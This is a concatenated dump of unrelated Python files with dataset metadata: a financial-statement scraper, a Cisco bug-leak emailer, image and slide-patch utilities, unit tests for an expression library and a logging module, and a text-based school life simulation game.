col = labels[fieldlabel][1]\n type = sheet_obj.cell(col, row).data_type\n value_10 = sheet_obj.cell(col, row)._value\n if (type == 'n' or type == 'f') and value_10 != None:\n array1[ind] = sheet_obj.cell(col, row)._value\n array2 = {fieldlabel: array1}\n return (array2)\n\n# for field in keys_list:\n# b2 = array_strip(self=None, fieldlabel=field)\n# array3.update(b2)\n\n# keys = dict.fromkeys(labels)\n# keys_list = list(keys)\n# a = labels[\"COGS\"][0]\n# b = sheet_obj.cell(labels[\"COGS\"][0], labels[\"COGS\"][1]).value\n\n# Old code -- superseded\n# Reads all of the text labels in a given file, creates dictionary of form {\"Revenue\": (3.3)}\n# for y in range(1,50):\n# for x in range(1,50):\n# cell_obj_new = sheet_obj.cell(row=y, column=x)\n# if cell_obj_new.data_type == 's':\n# lab = cell_obj_new.value\n# lab_addr = (x,y)\n# labels[lab] = lab_addr\n\n# Reads all of the text labels in a given file\n# for y in range(1,8):\n# for x in range(1,8):\n# cell_obj_new = sheet_obj.cell(row=y, column=x)\n# if cell_obj_new.data_type == 's':\n# lab = cell_obj_new.value\n# lab_addr = (x,y)\n# labels[lab] = lab_addr\n\n\n# a = labels[\"COGS\"][0]\n# b = sheet_obj.cell(labels[\"COGS\"][0], labels[\"COGS\"][1]).value\n\n# array1 = {}\n\n# for ind in range(0, 10):\n# row = labels[\"COGS\"][0] + ind\n# col = labels[\"COGS\"][1]\n# type = sheet_obj.cell(col, row).data_type\n# value_10 = sheet_obj.cell(col, row)._value\n# if (type == 'n' or type == 'f') and value_10 != None:\n# array1[ind] = sheet_obj.cell(col, row)._value\n# array2 = {\"COGS\": array1}\n","sub_path":"jupiter/FieldCapture.py","file_name":"FieldCapture.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"396114395","text":"# File created by J Bujarski\n# pic.py contains functions necessary for picture loading and viewing\n# load_pic:\n# Returns picture as a 2d array of RGB values, as per the w/h values passed in.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\n\n\ndef load_pic(name, wd, ht):\n img = Image.open(name)\n imgA = np.array(img.resize((wd, ht)))\n\n return imgA\n\n\ndef view_pic(name):\n plt.figure()\n plt.imshow(name)\n plt.show()\n","sub_path":"pic.py","file_name":"pic.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491254417","text":"from bs4 import BeautifulSoup\nimport requests\nfrom pandas import read_html\n\n\ndef stmts(script_code):\n try:\n x = int(script_code) \n script_code = str(x)\n if len(script_code) == 6:\n baseurl = 'https://www.screener.in/api/company/search/?q='\n url = (baseurl + script_code)\n urlreq = requests.get(url)\n stocks = urlreq.json()\n screener_url = stocks[0]['url']\n if len(screener_url) == 0: \n msg = {'info' : 'incoorect script_code'}\n return msg\n dope = ('https://www.screener.in'+str(screener_url)) \n res = requests.get(dope)\n soup = BeautifulSoup(res.content, 'lxml')\n\n df = read_html(dope,index_col=None)\n\n # QUARTERLY RESULTS\n quarter_res = df[0].to_dict()\n # PROFIT-LOSS STATEMENTS\n pl_stats = df[1].to_dict()\n # BALANCESHEETS\n bal_sheets = df[6].to_dict()\n # CASHFLOW\n cashf_stats = df[7].to_dict()\n statements = {'quarter_results':quarter_res, 'profit-loss_stats':pl_stats, 'balancesheets':bal_sheets,\n 'cashflow_stats':cashf_stats}\n\n # ANNUAL REPORT LINKS\n link_text, links, data, data_text = list(), list(), list(), list()\n for j in range(1,6):\n for link in soup.select(\"div.three:nth-of-type(2) li:nth-of-type(\"+str(j)+\") a\"):\n data = (link['href'])\n links.append(data)\n data_text = link.text.strip().replace(\"\\n\",\"\")\n link_text.append(data_text)\n annual_reports = dict(zip(link_text, links))\n\n # CREDIT-RATINGS REPORT LINKS\n link_text, links, data, data_text, count = list(), list(), list(), list(), int()\n count = len(soup.select(\"div.three:nth-of-type(3) a\"))\n for j in range(1,count+1):\n for link in soup.select(\"div.three:nth-of-type(3) li:nth-of-type(\"+str(j)+\") a\"):\n data = (link['href'])\n links.append(data)\n data_text = link.text.strip().replace(\"\\n\",\"\")\n link_text.append(data_text)\n credit_ratings = dict(zip(link_text, links))\n\n data = {'statements':statements, 'annual_reports':annual_reports, 'credit_ratings':credit_ratings}\n return data\n else:\n msg = {'info':'length of script_code should be 6 digit'}\n return msg\n except:\n msg = {'info' : 'Error'}\n return msg\n","sub_path":"bselib/statements.py","file_name":"statements.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"473492595","text":"import xlrd\nimport re\nimport os\nimport xlwt\nfrom xlutils.copy import copy\nfrom collections import defaultdict\nfrom smtplib import SMTP\nfrom email.mime.text import MIMEText # constructing messages\nfrom jinja2 import Environment # Jinja2 templating\n\nworkbook = xlrd.open_workbook(\"BUG LEAK ANALYSISbackup.xlsx\")\nworksheet = workbook.sheet_by_name(\"Sheet1\")\nwb = copy(workbook)\nsheet = wb.get_sheet(0)\nlist_of_ddts = []\nlist_of_components = []\nlist_of_headlines = []\n\n\nfor i in range(worksheet.nrows):\n list_of_ddts.append(worksheet.cell_value(i, 0))\nfor j in range(worksheet.nrows):\n list_of_components.append(worksheet.cell_value(j, 2))\nfor k in range(worksheet.nrows):\n list_of_headlines.append(worksheet.cell_value(k, 6))\nlist_of_ddts_id = list_of_ddts[1:]\nlist_of_components_final = list_of_components[1:]\nlist_of_headlines_final = list_of_headlines[1:]\nfor i in range(worksheet.nrows - 1):\n k = i + 1\n print(k)\n j = os.popen(\"/usr/cisco/bin/findcr -D '' -i \" + worksheet.cell_value(k, 0) + \" -w DTPT-manager\").read().split('\\n')[0]\n if j:\n sheet.write(k, 8, j)\n else:\n component = worksheet.cell_value(k, 2)\n null = None\n cmd = ''' /usr/cisco/bin/pims gsr -report comp_access_control -cdets_name {} -format json'''.format(component)\n js = os.popen(cmd).read()\n if (re.search(r\"\\\"dtpt_mgr\\\": \\\"(\\w+)\\\"\", js)):\n dtmgr = re.search(r\"\\\"dtpt_mgr\\\": \\\"(\\w+)\\\"\", js).group(1)\n else:\n dtmgr = \"mnamasev\"\n sheet.write(k, 8, dtmgr)\n\nsheet.write(0, 8, 'Test Mgr')\nwb.save('final_workbook.xlsx')\n\nworkbook_final = xlrd.open_workbook(\"final_workbook.xlsx\")\nsheet = workbook_final.sheet_by_name(\"Sheet1\")\nlist_of_test_mgrs = []\nfor m in range(sheet.nrows):\n list_of_test_mgrs.append(sheet.cell_value(m, 8))\nlist_of_test_mgrs_final = list_of_test_mgrs[1:]\n\nl3 = zip(list_of_test_mgrs_final, list_of_ddts_id, list_of_components_final, list_of_headlines_final)\nfinal_list = list(l3)\ndic = defaultdict(list)\nfor manager, bug, component, headline in final_list:\n dic[manager].append(bug)\n dic[manager].append(component)\n dic[manager].append(headline)\nfor k, v in dic.items():\n final_list2 = []\n for i in range(0, len(v), 3):\n final_list2.append(v[i:i + 3])\n for x in final_list2:\n if (re.search(r\"[Cc]losed?\",(os.popen(\"/usr/cisco/bin/findcr -D '' -i \" + x[0] + \" -w Attribute\").read().split('\\n')[0]))):\n final_list2.remove(x)\n print(final_list2)\n TEMPLATE = \"\"\"\n \n \n Bug Leak Report\n \n \n \n

Hi,

\n

Please Take corrective actions on the bugs on your name listed below:-

Add attribute \"closed\" after the action is successfully taken to avoid further mails on that particular bug
\n \n \n \n {% for item in list2 %}\n \n \n \n \n \n {% endfor %}\n
Bug IdComponentHeadline\n
{{ item[0] }}{{ item[1] }}{{ item[2] }}
\n
\n
Please don't reply to this email. For feedback please send email to Manjusha(mnamasev)
\n
Thanks,
NFT TEAM
\n \n \n \"\"\"\n # Create a text/html message from a rendered template\n if final_list2:\n msg = MIMEText(\n Environment().from_string(TEMPLATE).render(\n list2=final_list2\n ), \"html\"\n )\n subject = \"NFT To SIT Bug Leak Report- Corrective actions to be taken\"\n sender = \"nft-to-sit-bug-leak-report@cisco.com\"\n #recipient = k + '@cisco.com'\n recipient = ['ikyalnoo@cisco.com','mnamasev@cisco.com']\n msg['Subject'] = \"NFT To SIT Bug Leak Report- Corrective actions to be taken\"\n msg['From'] = \"nft-to-sit-bug-leak-report@cisco.com\"\n #msg['To'] = k + '@cisco.com'\n msg ['To'] = 'ikyalnoo@cisco.com'\n print(sender)\n print(k)\n print(recipient)\n\n # Send the message via our own local SMTP server.\n s = SMTP('outbound.cisco.com')\n s.sendmail(sender, recipient, msg.as_string())\n s.quit()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"509942987","text":"from site_crawler import SiteCrawler\nfrom series_worker import SeriesWorker\n\nclass SeriesDriver(object):\n \"\"\"\n Drives the acquisition of series +\n their subsequent storage in `directory`\n \"\"\"\n\n def __init__(self, directory):\n \"\"\"Constructor\"\"\"\n self.directory = directory\n\n def get_series_from_urls(self, urls):\n \"\"\"\n Get most popular series - `urls` = genre URLs\n \"\"\"\n # Threads dispatched\n threads = []\n for i in xrange(0, 10):\n t = SeriesWorker(self.directory, urls, i)\n threads.append(t)\n t.start()\n\n # Get them threads together\n for t in threads:\n t.join()\n","sub_path":"podcasts/series_driver.py","file_name":"series_driver.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"66378633","text":"# -*- coding: utf-8 -*-\nimport unittest\nimport copy\nfrom common.finder.interpret import LexicalAnalyser\nfrom common.finder.literal import TreeMatcher\nfrom common.finder.expression import SequenceExp, AlternationExp, NegativeExp, LiteralExp\n\n\nclass LiteralExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.a = LiteralExp('a')\n\t\tself.b = LiteralExp('b')\n\t\tself.ab = LiteralExp(['a', 'b'])\n\n\tdef test_eval(self):\n\t\tself.assertTrue(self.a.eval('test a'))\n\t\tself.assertTrue(self.ab.eval('test b'))\n\t\tself.assertFalse(self.ab.eval('test c'))\n\n\tdef test_merge(self):\n\t\tmeg = LiteralExp.merge([self.a, self.b])\n\t\tself.assertTrue(meg.eval(\"test a\"))\n\t\tself.assertTrue(meg.eval(\"test b\"))\n\n\nclass SequenceExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.a = LiteralExp('a')\n\t\tself.b = LiteralExp('b')\n\t\tself.ab = LiteralExp(['a', 'b'])\n\t\tself.seq = SequenceExp([self.a, self.b])\n\n\tdef test_eval(self):\n\t\tself.assertTrue(self.seq.eval(\"a and b\"))\n\t\tself.assertFalse(self.seq.eval(\"a and c\"))\n\n\tdef test_prune(self):\n\t\torigin = copy.deepcopy(self.seq)\n\t\tpruned = self.seq.prune()\n\t\tself.assertEqual(pruned, self.seq)\n\t\tself.assertEqual(origin.eval('test ab'), pruned.eval('test ab'))\n\t\tself.assertEqual(origin.eval('test a'), pruned.eval('test a'))\n\n\tdef test_prune_all_seq(self):\n\t\tc = LiteralExp('c')\n\t\td = LiteralExp('d')\n\t\tseq2 = SequenceExp([c, d])\n\t\tseq_of_seqs = SequenceExp([self.seq, seq2])\n\n\t\torigin = copy.deepcopy(seq_of_seqs)\n\t\tpruned = seq_of_seqs.prune()\n\t\tself.assertNotEqual(origin, pruned)\n\t\tself.assertEqual(origin.eval('test abcd'), pruned.eval('test abcd'))\n\t\tself.assertEqual(origin.eval('test ac'), pruned.eval('test ac'))\n\t\tself.assertEqual(origin.eval('test ab'), pruned.eval('test ab'))\n\t\tself.assertEqual(origin.eval('test a'), pruned.eval('test a'))\n\n\nclass AlternationExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\tself.a = LiteralExp('a')\n\t\tself.b = LiteralExp('b')\n\t\tself.c = LiteralExp('c')\n\t\tself.d = LiteralExp('d')\n\t\tself.seq = SequenceExp([self.a, self.b])\n\t\tself.ab = LiteralExp(['a', 'b'])\n\t\tself.alt = AlternationExp([self.a, self.b])\n\t\tself.alt_seq = AlternationExp([self.seq, self.c])\n\n\tdef test_eval(self):\n\t\tself.assertTrue(self.alt.eval(\"a or c\"))\n\t\tself.assertFalse(self.alt.eval(\"d or c\"))\n\n\t\tself.assertFalse(self.alt_seq.eval(\"a test\"))\n\t\tself.assertTrue(self.alt_seq.eval(\"a b test\"))\n\t\tself.assertTrue(self.alt_seq.eval(\"test c\"))\n\t\tself.assertFalse(self.alt_seq.eval(\"test d\"))\n\n\tdef test_prune(self):\n\t\t# able to prune\n\t\tpruned_alt = self.alt.prune()\n\t\tself.assertEqual(pruned_alt.__class__, LiteralExp)\n\t\tself.assertEqual(pruned_alt.data, ['a', 'b'])\n\n\t\t# impossible to prune\n\t\tpruned_alt_seq = self.alt_seq.prune()\n\t\tself.assertEqual(pruned_alt_seq.__class__, AlternationExp)\n\t\tself.assertEqual(pruned_alt_seq, self.alt_seq)\n\n\n\tdef test_prune_symmetric(self):\n\t\t# merge to one\n\t\talt_alts = AlternationExp([self.alt, AlternationExp([self.c, self.d])])\n\t\tpruned_alt_alts = alt_alts.prune()\n\t\tself.assertEqual(pruned_alt_alts.__class__, LiteralExp)\n\t\tself.assertEqual(pruned_alt_alts.data, list(set(['a', 'b', 'c', 'd'])))\n\t\n\n\tdef test_prune_unsymmetric(self):\n\t\talt_alt_lit = AlternationExp([self.alt, self.ab])\n\t\tpruned_alt_alt_lit = alt_alt_lit.prune()\n\t\tself.assertEqual(pruned_alt_alt_lit.data, ['a', 'b'])\n\n\nclass NegativeExpTestCase(unittest.TestCase):\n\tdef setUp(self):\n\t\ta = LiteralExp('a')\n\t\tb = LiteralExp('b')\n\t\talt = AlternationExp([a, b])\n\t\tseq = SequenceExp([a, b])\n\t\tself.neg_seq = NegativeExp(seq)\n\n\tdef test_eval(self):\n\t\tself.assertFalse(self.neg_seq.eval(\"a and b\"))\n\t\tself.assertTrue(self.neg_seq.eval(\"a and c\"))\n\t\t","sub_path":"src/tests/common/finder/test_expression.py","file_name":"test_expression.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"501386211","text":"\nimport openslide\nimport numpy as np\nimport glob\nimport os\nimport argparse\nfrom multiprocessing import Pool, Process\nimport multiprocessing\nimport itertools\nimport threading\n\n\nparser = argparse.ArgumentParser(description='Process args for patch extraction')\nparser.add_argument(\"--root_dir\", type=str, required=True, help=\"Root directory\")\nparser.add_argument(\"--dest_dir\", type=str, required=True, help=\"Destination directory\")\nparser.add_argument(\"--level\", type=int, default=1, help=\"0 means 40x, 1 means 20x\")\nparser.add_argument(\"--patch_size\", type=int, default=512, help=\"Patch Size\")\nparser.add_argument(\"--whiteness_limit\", type=int, default=210, help=\"Whiteness Limit\")\nparser.add_argument(\"--blackness_limit\", type=int, default=5, help=\"Blackness Limit\")\nparser.add_argument(\"--max_faulty_pixels\", type=int, default=160000, help=\"Max allowed # of only B/W pixels\")\n\n\ndef valid_slide(slide, level, blackness_limit):\n # tests if a random patch is full black (as a proxy test for full black slides)\n try:\n test_patch = slide.read_region(location=(100, 100), level=level, size=(100, 100)).convert('RGB')\n except:\n return False\n arr = np.array(test_patch)\n if np.all(arr=1 and grade<=9:\n label = \"cancer\"\n elif grade>=10 and grade<=19:\n label = \"normal\"\n elif grade >=20:\n label = \"control\"\n if not os.path.exists(os.path.join(dest_dir, label, slide_id)):\n os.makedirs(os.path.join(dest_dir, label, slide_id))\n\n level = len(slide.level_downsamples)-1 # select highest possible level\n\n def reject_or_save_patch(x, y):\n patch = slide.read_region(location=(x,y), level=level, size=(patch_size, patch_size)).convert('RGB')\n arr = np.array(patch)\n is_white = np.all([arr[:,:,i]>whiteness_limit for i in range(3)], axis=0)\n is_black = np.all([arr[:,:,i]max_faulty_pixels:\n return\n patch.save(os.path.join(dest_dir, label, slide_id, \"{}_X_{}_Y_{}.png\".format(filename[:-4], x, y)))\n\n width, height = slide.dimensions\n\n # # TODO: 4* signifies downsample ie slide.level_downsamples[1]\n # threads=[]\n # for x in range(0, width, 4*patch_size//2):\n # for y in range(0, height, 4*patch_size//2):\n # if x==0 or y==0 or x+4*patch_size>width or y+4*patch_size>height:\n # continue\n # t = threading.Thread(target=reject_or_save_patch, args=(x, y))\n # threads.append(t)\n # thread_groups = [threads[i*5:(i+1)*5] for i in range(len(threads)//5+1)]\n # for grp in thread_groups:\n # for t in grp:\n # t.start()\n # for t in grp:\n # t.join()\n\n for x in range(0, width, 4*patch_size//2):\n for y in range(0, height, 4*patch_size//2):\n if x==0 or y==0 or x+4*patch_size>width or y+4*patch_size>height:\n continue\n reject_or_save_patch(x, y)\n slide.close()\n print(\"Slide {} Done.\".format(slide_file), flush=True)\n\n\ndef main():\n args = parser.parse_args()\n root_dir = args.root_dir\n dest_dir = args.dest_dir\n level = args.level\n patch_size = args.patch_size\n whiteness_limit = args.whiteness_limit\n blackness_limit = args.blackness_limit\n max_faulty_pixels = args.max_faulty_pixels\n\n ## TODO: change this if your storage format is different\n slide_files = glob.glob(\"{}/*/*/*.svs\".format(root_dir))\n\n for label in [\"cancer\", \"normal\", \"control\"]:\n if not os.path.exists(os.path.join(dest_dir, label)):\n os.makedirs(os.path.join(dest_dir, label))\n\n pool = Pool(multiprocessing.cpu_count())\n paramlist = list(itertools.product(slide_files,[level],[patch_size],[whiteness_limit],\\\n [blackness_limit], [max_faulty_pixels], [dest_dir]))\n pool.map(create_patches, paramlist)\n\n\nif __name__==\"__main__\":\n main()\n","sub_path":"old/extract_patches.py","file_name":"extract_patches.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"317006017","text":"import time\nimport unittest\n\nimport director\n\nfrom director import tests\n\n\nclass TestLogger(unittest.TestCase):\n def setUp(self):\n self.log = director.LogSetup()\n\n self.uid_patched = unittest.mock.patch(\"director.os.getuid\")\n self.uid = self.uid_patched.start()\n\n self.env_patched = unittest.mock.patch(\"director.os.path.expanduser\")\n self.env = self.env_patched.start()\n\n self.idr_patched = unittest.mock.patch(\"director.os.path.isdir\")\n self.idr = self.idr_patched.start()\n\n self.stat_patched = unittest.mock.patch(\"director.os.stat\")\n self.stat = self.stat_patched.start()\n\n def tearDown(self):\n self.uid_patched.stop()\n self.env_patched.stop()\n self.idr_patched.stop()\n\n def test_logger_max_backup(self):\n self.assertEqual(self.log.max_backup, 5)\n\n def test_logger_max_size(self):\n self.assertEqual(self.log.max_size, 524288000)\n\n def test_logger_debug_logging(self):\n self.assertEqual(self.log.debug_logging, False)\n\n def test_logger_override_backup(self):\n log = director.LogSetup(max_backup=10)\n self.assertEqual(log.max_backup, 10)\n\n def test_logger_override_max_backup(self):\n log = director.LogSetup(max_backup=10)\n self.assertEqual(log.max_backup, 10)\n\n def test_logger_override_max_size(self):\n log = director.LogSetup(max_size=10)\n self.assertEqual(log.max_size, 10485760)\n\n def test_logger_debug_logging_enabled(self):\n log = director.LogSetup(debug_logging=True)\n self.assertEqual(log.debug_logging, True)\n\n def test_logger_return_logfile_not_root_new_log_dir(self):\n self.uid.return_value = 99\n self.env.return_value = \"/home/TestUser\"\n self.idr.return_value = False\n self.stat.return_value = tests.FakeStat(uid=99, gid=99)\n logfile = self.log.return_logfile(\n filename=\"test_file\", log_dir=\"/other\"\n )\n self.assertEqual(logfile, \"/home/TestUser/test_file\")\n\n def test_logger_return_logfile_root_new_log_dir(self):\n self.uid.return_value = 0\n self.env.return_value = \"/root\"\n self.idr.return_value = True\n self.stat.return_value = tests.FakeStat(uid=0, gid=0)\n logfile = self.log.return_logfile(\n filename=\"test_file\", log_dir=\"/other\"\n )\n self.assertEqual(logfile, \"/other/test_file\")\n\n def test_logger_return_logfile_not_root(self):\n self.uid.return_value = 99\n self.env.return_value = \"/home/TestUser\"\n self.stat.return_value = tests.FakeStat(uid=0, gid=0)\n logfile = self.log.return_logfile(filename=\"test_file\")\n self.assertEqual(logfile, \"/home/TestUser/test_file\")\n\n def test_logger_return_logfile_root(self):\n self.uid.return_value = 0\n self.env.return_value = \"/root\"\n self.idr.return_value = True\n self.stat.return_value = tests.FakeStat(uid=0, gid=0)\n logfile = self.log.return_logfile(filename=\"test_file\")\n self.assertEqual(logfile, \"/var/log/test_file\")\n\n def test_logger_return_logfile_root_log_dir_not_found(self):\n self.uid.return_value = 0\n self.env.return_value = \"/root\"\n self.idr.return_value = False\n logfile = self.log.return_logfile(\n filename=\"test_file\", log_dir=\"/other\"\n )\n self.assertEqual(logfile, \"/root/test_file\")\n\n\nclass TestLoggerHandlers(unittest.TestCase):\n def setUp(self):\n\n self.rh_patched = unittest.mock.patch(\n \"director.handlers.RotatingFileHandler\"\n )\n self.rh = self.rh_patched.start()\n\n self.sh_patched = unittest.mock.patch(\"director.logging.StreamHandler\")\n self.sh = self.sh_patched.start()\n\n self.log = director.LogSetup()\n\n self._log = unittest.mock.Mock()\n self._handler = unittest.mock.Mock()\n\n def tearDown(self):\n self.rh_patched.stop()\n self.sh_patched.stop()\n\n def test_getlogger_new_logger(self):\n log = director.getLogger(name=\"testLogger\")\n for handler in log.handlers:\n return self.assertTrue(handler.name == \"testLogger\")\n else:\n self.fail(\"The log handler name was not set\")\n\n def test_logger_default_logger(self):\n self.log.format = \"%(test)s\"\n self.log.default_logger(\n name=\"test_log\", enable_file=False, enable_stream=False\n )\n self.assertEqual(self.log.format, \"%(test)s\")\n\n def test_logger_enable_file(self):\n self.log.default_logger(\n name=\"test_log\", enable_file=True, enable_stream=False\n )\n self.assertTrue(self.rh.called)\n self.assertFalse(self.sh.called)\n\n def test_logger_enable_stream(self):\n self.log.default_logger(\n name=\"test_log\", enable_file=False, enable_stream=True\n )\n self.assertFalse(self.rh.called)\n self.assertTrue(self.sh.called)\n\n def test_logger_enable_stream_enable_file(self):\n self.log.default_logger(\n name=\"test_log\", enable_file=True, enable_stream=True\n )\n self.assertTrue(self.rh.called)\n self.assertTrue(self.sh.called)\n\n def test_logger_set_handler(self):\n self.log.set_handler(log=self._log, handler=self._handler)\n self.assertTrue(self._log.setLevel.called)\n self.assertTrue(self._handler.setFormatter.called)\n self.assertTrue(self._log.addHandler.called)\n\n\nclass TestProcessor(unittest.TestCase):\n def setUp(self):\n self.log_patched = unittest.mock.patch(\"director.getLogger\")\n self.log = self.log_patched.start()\n self.processor = director.Processor()\n\n def tearDown(self):\n self.log_patched.stop()\n\n def test_wq_prune_0(self):\n workers = self.processor.wq_prune(workers={})\n self.assertDictEqual(workers, dict())\n self.log.debug.called_once()\n\n def test_wq_prune_valid(self):\n workers = self.processor.wq_prune(\n workers={\n \"valid1\": time.time() + 2,\n \"invalid1\": time.time() - 2,\n \"invalid2\": time.time() - 3,\n }\n )\n self.assertEqual(len(workers), 1)\n self.assertIn(\"valid1\", workers)\n self.log.debug.called_once()\n\n def test_wq_empty(self):\n self.processor.workers[\"valid1\"] = (time.time() + 2,)\n self.processor.workers[\"invalid1\"] = (time.time() - 2,)\n self.processor.workers[\"invalid2\"] = time.time() - 3\n self.assertEqual(len(self.processor.workers), 3)\n self.processor.wq_empty(workers=self.processor.workers)\n self.assertEqual(len(self.processor.workers), 0)\n\n def test_read_in_chunks(self):\n chunks = list()\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=\"data\")\n ) as mock_file:\n with open(mock_file) as f:\n for d in self.processor.read_in_chunks(file_object=f):\n chunks.append(d)\n self.log.debug.called_once()\n self.assertListEqual(chunks, [\"data\"])\n\n def test_read_in_chunks_set_chunk(self):\n chunks = list()\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=\"data\")\n ) as mock_file:\n with open(mock_file) as f:\n for d in self.processor.read_in_chunks(\n file_object=f, chunk_size=1\n ):\n chunks.append(d)\n self.log.debug.called_once()\n self.assertListEqual(chunks, [\"d\", \"a\", \"t\", \"a\"])\n\n def test_file_sha1(self):\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=b\"data\")\n ) as mock_file:\n sha1 = self.processor.file_sha1(file_path=mock_file)\n self.assertEqual(sha1, \"a17c9aaa61e80a1bf71d0d850af4e5baa9800bbd\")\n\n def test_file_sha1_set_chunk(self):\n with unittest.mock.patch(\n \"builtins.open\", unittest.mock.mock_open(read_data=b\"data\")\n ) as mock_file:\n sha1 = self.processor.file_sha1(file_path=mock_file, chunk_size=1)\n self.assertEqual(sha1, \"a17c9aaa61e80a1bf71d0d850af4e5baa9800bbd\")\n\n def test_object_sha1(self):\n sha1 = self.processor.object_sha1(obj={\"test\": \"value\"})\n self.assertEqual(sha1, \"4e0b1f3b9b1e08306ab4e388a65847c73a902097\")\n\n\nclass TestUnixSocket(unittest.TestCase):\n def setUp(self):\n self.socket_patched = unittest.mock.patch(\"director.socket.socket\")\n self.socket = self.socket_patched.start()\n\n def tearDown(self):\n self.socket_patched.stop()\n\n def test_unix_socket(self):\n with director.UNIXSocketConnect(sock_path=\"/test.sock\") as c:\n c.connect.assert_called_once_with(\"/test.sock\")\n c.close.assert_called_once()\n self.socket.assert_called_once_with(\n director.socket.AF_UNIX, director.socket.SOCK_STREAM\n )\n","sub_path":"director/tests/test_init.py","file_name":"test_init.py","file_ext":"py","file_size_in_byte":8999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"143829987","text":"import random\n \nhappiness = random.randint(25,100)\nhealth = random.randint(25,100)\nsmarts = random.randint(25,100)\nlooks = random.randint(25,100)\ndeath_chance= 200\npossible_genders = [\"male\",\"female\",\"alien\"]\ngender= random.choice(possible_genders)\ncompleted_scenarios = []\ntimes_studied = []\ntimes_workedout = []\n\nclass Person:\n def __init__(self,name,status,month_display,month_total,grade,gender,popularity,happiness,health,smarts,looks):\n self.name = name\n self.status = status\n self.month_display = month_display\n self.month_total = month_total\n self.grade= grade\n self.gender = gender\n self.popularity = popularity\n self.happiness = happiness\n self.health = health\n self.smarts = smarts \n self.looks = looks\n \n def introduce(self):\n print(f\"Welcome {self.name} to your first day of 9th grade. You were born {self.gender}.\")\n\n def stats(self):\n print(f\"Grade: {self.grade} \\nMonth: {self.month_display} \\n\\n Stats:\\n Popularity: {self.popularity} \\n Happiness: {self.happiness} \\n Health: {self.health} \\n Smarts: {self.smarts} \\n Looks: {self.looks} \\n\")\n \n def month_up(self):\n self.month_display += 1\n self.month_total += 1\n\n def school_scenarios(self):\n global completed_scenarios\n \n if self.grade == 9:\n while True:\n scenario = random.randint(1,6)\n if scenario not in completed_scenarios:\n break\n if scenario == 1:\n if 1 not in completed_scenarios:\n completed_scenarios.append(1)\n while True:\n x = input(\"A bully wants to take your lunch. \\n What will you do? \\n \\n a= punch the bully \\n b= give the bully your lunch \\n c = run away \\n\")\n if x == 'a':\n fight = random.randint(1,2)\n if fight == 1:\n print(\"You got beat up\")\n self.health -= 10\n print(\"OOF that one hurt. Your health just went down ten points\")\n break\n if fight == 2:\n print(\"You won\")\n self.happiness += 10\n print(\"Congrats you surprisingly won! Your happiness went up 10 points\")\n break\n elif x == 'b':\n self.happiness -= 10\n print(\"That one was a blow to your self esteem. Your happiness went down 10 points\")\n break\n elif x == 'c':\n self.smarts += 5\n print(\"Finally, you did something intelligent. Your smarts went up 5 points\")\n break\n else:\n print(\"Error\")\n \n elif scenario == 2:\n if 2 not in completed_scenarios:\n completed_scenarios.append(2)\n while True:\n x = input(\"You are assigned a group project from your freshman technology teacher. What are you going to do? \\n \\n a= do all the work \\n b= do none of the work \\n c= split up the work evenly \\n\")\n if x == 'a':\n self.smarts += 10\n print(\"Congrats try hard. Your now THAT kid, but hey your smarts went up 10 points\")\n break\n elif x == 'b':\n self.popularity -= 10\n print(\"Ew. Now your THAT kid. No one likes you so you lost 10 popularity points\")\n break\n elif x == 'c':\n self.popularity += 5\n print(\"You're chill with your groupmates now. You gained 5 popularity points\")\n break\n else:\n print(\"Error\")\n \n elif scenario == 3:\n if 3 not in completed_scenarios:\n completed_scenarios.append(3)\n while True:\n x = input(\"Your mom is yelling at you for getting a bad grade in Dr. Gupta's freshman biology class. What is your next move? \\n \\n a= give up and cry \\n b= study harder \\n c= bribe the teacher \\n\")\n if x == 'a':\n self.happiness -= 10\n print(\"Since you are a sad, depressed, loser your happiness went down ten points\")\n break\n elif x == 'b':\n self.smarts += 10\n print(\"Wow! Good job! You actually made a good decision. Your smarts went up 10 points\")\n break\n elif x == 'c':\n self.smarts -= 10\n print(\"Nice try! But she failed you and gave you a fat 0. Your smarts went down 10 points.\")\n break\n else:\n print(\"Error\")\n elif scenario ==4:\n if 4 not in completed_scenarios:\n completed_scenarios.append(4)\n while True:\n x = input(\"You are on the way to school and you can't find your idea? What are you going to do? \\n \\n a= Take the L(OP) \\n b= Try to sneak into school without it \\n c= run back home \\n\")\n if x=='a':\n print(\"Well good job losng your ID bozo. It turns out that during your LOP they gave out free food in the cafeteria. You lost 10 points of happiness\")\n self.happiness -=10\n break\n if x=='b':\n print(\"You got caught trying to sneak into school. Now you have LOP for the whole week. You lost 20 points of happiness\")\n self.happiness -=20\n break\n if x =='c':\n print(\"You found your ID! One problem though you got back to school late, but who really cares about that. Happiness is up 10 points.\")\n self.happiness += 10\n break\n else:\n print(\"Error\")\n elif scenario ==5:\n if 5 not in completed_scenarios:\n completed_scenarios.append(5)\n while True:\n x = input(\"You are in the cafeteria, but you don't see any of your friends. What are you going to do? \\n a= eat lunch in the bathroom \\n b= make new friends \\n c= go talk to a teacher about something \\n \")\n if x=='a':\n 